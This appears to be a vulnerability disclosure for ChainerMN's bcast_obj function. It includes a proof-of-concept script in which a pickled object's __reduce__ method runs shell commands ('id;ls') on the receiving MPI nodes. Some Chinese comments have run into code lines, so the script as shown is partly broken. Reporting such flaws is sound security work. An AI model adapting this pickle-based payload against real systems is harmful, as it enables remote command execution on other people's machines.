The function in Chainer's module contains a deserialization vulnerability. When non-root nodes receive data, deserialization occurs, leading to Remote Code Execution (RCE). As demonstrated in the article https://mpitutorial.com/tutorials/running-an-mpi-cluster-within-a-lan/, MPI involves network services, meaning this is not merely a local deserialization vulnerability. Please review this carefully.bcast_objchainermn
For ease of reproduction, a local single-node verification script and command are provided here.
import chainermn
from mpi4py import MPI
import pickle
class SimpleModel:
def __reduce__(self):
return (__import__('os').system, ("id;ls",))
some = pickle.dumps(SimpleModel())
# 初始化 MPI 通信
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
# 创建 Chainermn 的 communicator
communicator = chainermn.create_communicator('naive')
# `rank 0` 节点发送数据,其他节点接收数据if rank == 0:
data = (SimpleModel())
else:
data = None
data = communicator.bcast_obj(data, root=0)
# 打印接收到的数据print(f"节点 (rank {rank}): 收到数据 '{data}'")
# 示例:进行集合操作(如果需要)# 每个节点生成要收集的数据
data_to_gather = f"Data from {rank}"
# 使用 gather 收集数据到 rank 0
gathered_data = comm.gather(some, root=0)
# `rank 0` 节点输出收集到的数据if rank == 0:
print(f"节点 (rank {rank}): 收到的数据 {gathered_data}")
# 同步所有进程
comm.Barrier()
run it
mpirun python3 master.py
output
Deserialization Arbitrary Command Execution